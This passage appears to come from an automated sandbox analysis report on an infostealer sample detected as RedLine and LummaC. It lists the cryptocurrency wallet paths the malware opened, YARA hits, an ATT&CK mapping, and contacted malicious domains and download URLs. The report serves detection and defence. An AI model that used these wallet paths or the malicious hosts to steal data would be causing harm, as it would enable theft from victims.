                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                    Source: Yara matchFile source: 00000009.00000003.2764259056.0000000003494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000003.2760836658.0000000003494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: dlcdkJcbbV.exe PID: 6864, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 8060, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 8060, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: dlcdkJcbbV.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.dlcdkJcbbV.exe.8d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.2304090109.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: dlcdkJcbbV.exe PID: 6864, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		11
                    File and Directory Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    PowerShell                    		1
                    Registry Run Keys / Startup Folder                    		311
                    Process Injection                    		11
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		113
                    System Information Discovery                    		Remote Desktop Protocol41
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Registry Run Keys / Startup Folder                    		3
                    Obfuscated Files or Information                    		Security Account Manager1
                    Query Registry                    		SMB/Windows Admin Shares21
                    Input Capture                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Timestomp                    		NTDS421
                    Security Software Discovery                    		Distributed Component Object Model2
                    Clipboard Data                    		3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets1
                    Process Discovery                    		SSHKeylogging14
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials341
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items341
                    Virtualization/Sandbox Evasion                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1468951 Sample: dlcdkJcbbV.exe Startdate: 08/07/2024 Architecture: WINDOWS Score: 100 35 willingyhollowsk.shop 2->35 37 potterryisiw.shop 2->37 39 4 other IPs or domains 2->39 55 Snort IDS alert for network traffic 2->55 57 Multi AV Scanner detection for domain / URL 2->57 59 Found malware configuration 2->59 61 9 other signatures 2->61 8 dlcdkJcbbV.exe 20 17 2->8         started        signatures3 process4 dnsIp5 49 185.215.113.67, 40960, 49710 WHOLESALECONNECTIONSNL Portugal 8->49 51 bitbucket.org 104.192.141.1, 443, 49712 AMAZON-02US United States 8->51 53 s3-w.us-east-1.amazonaws.com 52.216.42.97, 443, 49713 AMAZON-02US United States 8->53 27 C:\Users\user\AppData\Local\Temp\7.exe, PE32+ 8->27 dropped 71 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->71 73 Found many strings related to Crypto-Wallets (likely being stolen) 8->73 75 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 8->75 77 2 other signatures 8->77 13 7.exe 2 8->13         started        16 chrome.exe 9 8->16         started        file6 signatures7 process8 dnsIp9 79 Multi AV Scanner detection for dropped file 13->79 81 Writes to foreign memory regions 13->81 83 Allocates memory in foreign processes 13->83 85 2 other signatures 13->85 19 BitLockerToGo.exe 13->19         started        29 192.168.2.12, 40960, 443, 49586 unknown unknown 16->29 31 192.168.2.9 unknown unknown 16->31 33 239.255.255.250 unknown Reserved 16->33 23 chrome.exe 16->23         started        25 chrome.exe 16->25         started        signatures10 process11 dnsIp12 41 potterryisiw.shop 188.114.96.3, 443, 49736, 49737 CLOUDFLARENETUS European Union 19->41 63 Query firmware table information (likely to detect VMs) 19->63 65 Found many strings related to Crypto-Wallets (likely being stolen) 19->65 67 Tries to harvest and steal ftp login credentials 19->67 69 2 other signatures 19->69 43 www.google.com 216.58.212.132, 443, 49732 GOOGLEUS United States 23->43 45 iplogger.co 172.67.167.249, 443, 49716, 49721 CLOUDFLARENETUS United States 23->45 47 142.250.185.164, 443, 49750 GOOGLEUS United States 25->47 signatures13

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    dlcdkJcbbV.exe71%ReversingLabsByteCode-MSIL.Ransomware.RedLine
                    dlcdkJcbbV.exe78%VirustotalBrowse
                    dlcdkJcbbV.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\7.exe83%ReversingLabsWin64.Trojan.Casdet

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    s3-w.us-east-1.amazonaws.com0%VirustotalBrowse
                    bitbucket.org0%VirustotalBrowse
                    potterryisiw.shop17%VirustotalBrowse
                    www.google.com0%VirustotalBrowse
                    iplogger.co4%VirustotalBrowse
                    willingyhollowsk.shop14%VirustotalBrowse
                    bbuseruploads.s3.amazonaws.com3%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/sc/sct0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk0%URL Reputationsafe
                    http://tempuri.org/Entity/Id23ResponseD0%URL Reputationsafe
                    http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                    http://tempuri.org/0%URL Reputationsafe
                    http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha10%URL Reputationsafe
                    http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                    http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap0%URL Reputationsafe
                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/fault0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wsat0%URL Reputationsafe
                    http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey0%URL Reputationsafe
                    https://api.ip.sb/ip0%URL Reputationsafe
                    http://tempuri.org/Entity/Id1ResponseD0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA10%URL Reputationsafe
                    http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse0%URL Reputationsafe
                    http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns0%URL Reputationsafe
                    http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust/Renew0%URL Reputationsafe
                    http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2006/02/addressingidentity0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT0%URL Reputationsafe
                    http://tempuri.org/D0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/06/addressingex0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse0%URL Reputationsafe
                    http://x1.c.lencr.org/00%URL Reputationsafe
                    http://x1.i.lencr.org/00%URL Reputationsafe
                    http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ15100%URL Reputationsafe
                    https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696506299400400001.1&ci=1696506299033.12791&cta0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id13Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id6ResponseD0%Avira URL Cloudsafe
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA10%URL Reputationsafe
                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA10%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct0%URL Reputationsafe
                    http://tempuri.org/Entity/Id13ResponseD0%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                    https://aui-cdn.atlassian.com/0%Avira URL Cloudsafe
                    https://bitbucket.org0%Avira URL Cloudsafe
                    https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                    https://potterryisiw.shop/apiM100%Avira URL Cloudmalware
                    https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                    http://tempuri.org/Entity/Id13ResponseD1%VirustotalBrowse
                    https://bbuseruploads.s3.amazonaws.com0%Avira URL Cloudsafe
                    https://bitbucket.org0%VirustotalBrowse
                    https://potterryisiw.shop/apiK100%Avira URL Cloudmalware
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                    https://aui-cdn.atlassian.com/0%VirustotalBrowse
                    http://tempuri.org/Entity/Id6ResponseD1%VirustotalBrowse
                    https://potterryisiw.shop/apiM3%VirustotalBrowse
                    http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
                    https://potterryisiw.shop/apiD100%Avira URL Cloudmalware
                    ellaboratepwsz.xyz100%Avira URL Cloudmalware
                    swellfrrgwwos.xyz100%Avira URL Cloudmalware
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                    https://iplogger.co/favicon.ico100%Avira URL Cloudmalware
                    http://tempuri.org/Entity/Id21ResponseD0%Avira URL Cloudsafe
                    https://potterryisiw.shop/apir100%Avira URL Cloudmalware
                    ellaboratepwsz.xyz16%VirustotalBrowse
                    https://potterryisiw.shop:443/api100%Avira URL Cloudmalware
                    https://potterryisiw.shop/apie100%Avira URL Cloudmalware
                    swellfrrgwwos.xyz17%VirustotalBrowse
                    https://potterryisiw.shop:443/api19%VirustotalBrowse
                    foodypannyjsud.shop100%Avira URL Cloudmalware
                    http://tempuri.org/Entity/Id21ResponseD1%VirustotalBrowse
                    https://cdn.cookielaw.org/0%Avira URL Cloudsafe
                    https://potterryisiw.shop/apii100%Avira URL Cloudmalware
                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbmfQq%2B4pbW4pbWfpbX7ReNxR3UIG8zInwYIFIVs9e0%Avira URL Cloudsafe
                    https://iplogger.co/https://iplogger.co/1lLubiplogger.co/1lLub100%Avira URL Cloudmalware
                    https://cdn.cookielaw.org/0%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    s3-w.us-east-1.amazonaws.com
                    		52.216.42.97
                    		truefalseunknown
                    bitbucket.org
                    		104.192.141.1
                    		truefalseunknown
                    potterryisiw.shop
                    		188.114.96.3
                    		truetrueunknown
                    www.google.com
                    		216.58.212.132
                    		truefalseunknown
                    iplogger.co
                    		172.67.167.249
                    		truefalseunknown
                    bbuseruploads.s3.amazonaws.com
                    		unknown
                    		unknownfalseunknown
                    willingyhollowsk.shop
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    ellaboratepwsz.xyztrue
                    • 16%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    swellfrrgwwos.xyztrue
                    • 17%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    https://iplogger.co/favicon.icofalse
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    foodypannyjsud.shoptrue
                    • 19%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    https://bitbucket.org/tanosx/clockbrix/downloads/Chrome_Password_Remover.exefalse
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/sc/sctdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://duckduckgo.com/chrome_newtabdlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2726583826.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2726391359.00000000057DE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=dlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.000000000339A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2726583826.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2726391359.00000000057DE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696506299400400001.1&ci=1696506299033.12791&ctaBitLockerToGo.exe, 00000009.00000003.2749860293.00000000057CE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/Entity/Id23ResponseDdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Entity/Id12ResponsedlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Entity/Id2ResponsedlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Entity/Id21ResponsedlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Entity/Id6ResponseDdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E7D000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssuedlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/AborteddlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencedlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Entity/Id13ResponseDdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/faultdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wsatdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://aui-cdn.atlassian.com/dlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.000000000308E000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000030AB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/Entity/Id15ResponsedlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E7D000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://bitbucket.orgdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000003089000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeydlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://potterryisiw.shop/apiMBitLockerToGo.exe, 00000009.00000003.2725717754.00000000034A7000.00000004.00000020.00020000.00000000.sdmptrue
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    https://api.ip.sb/ipdlcdkJcbbV.exefalse
                    • URL Reputation: safe
                    		unknown
                    https://bbuseruploads.s3.amazonaws.comdlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000030AF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/Entity/Id1ResponseDdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CanceldlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
